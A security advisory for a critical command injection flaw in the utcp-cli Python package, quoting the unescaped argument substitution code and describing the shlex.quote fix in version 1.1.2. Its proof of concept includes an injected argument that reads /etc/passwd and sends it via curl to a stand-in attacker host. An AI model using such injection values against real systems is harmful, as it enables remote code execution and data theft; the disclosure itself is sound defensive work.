PT-2026-53629 · Pypi · Utcp-Cli

Publicado

2026-06-29

·

Atualizado

2026-06-29

CVSS v3.1

10

Crítica

VetorAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary

The substitute utcp args method in cli communication protocol.py inserts user-controlled tool args values directly into shell command strings without any sanitization or escaping. These commands are then executed via /bin/bash -c (Unix) or powershell.exe -Command (Windows), allowing an attacker to inject arbitrary shell commands.

Affected File

plugins/communication protocols/cli/src/utcp cli/cli communication protocol.py

Vulnerable Code

python
def replace placeholder(match):
  arg name = match.group(1)
  if arg name in tool args:
    return str(tool args[arg name]) # No escaping applied
The substituted command is then embedded directly into a shell script:
python
script lines.append(f'{var name}=$({substituted command} 2>&1)')
And executed via:
python
shell cmd = ['/bin/bash', '-c', script]

Proof of Concept

Given a tool defined as:
json
{"command": "python script.py --input UTCP ARG filename UTCP END"}
Calling with:
python
tool args = {"filename": "data.csv; curl http://attacker.com/$(cat /etc/passwd | base64)"}
Produces and executes:
bash
CMD 0 OUTPUT=$(python script.py --input data.csv; curl http://attacker.com/$(cat /etc/passwd | base64) 2>&1)
This results in full Remote Code Execution on the host system.

Patched

Fixed in utcp-cli 1.1.2. substitute utcp args now shell-quotes every substituted value: shlex.quote on Unix, a PowerShell single-quoted literal on Windows. Each UTCP ARG ... UTCP END placeholder therefore expands to exactly one shell token, blocking metacharacter injection (;, |, &, backticks, $(), newlines).
Behavior change: tools that relied on a single placeholder splitting into multiple shell tokens (e.g. UTCP ARG flags UTCP END -> --verbose --debug) must now use one placeholder per intended argument.

Mitigation

Upgrade to utcp-cli >= 1.1.2. There is no workaround in earlier versions short of refusing all attacker-controlled tool args.

Credit

Reported by @ZeroXJacks.

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Identificadores relacionados

PYSEC-2026-560

Produtos afetados

Utcp-Cli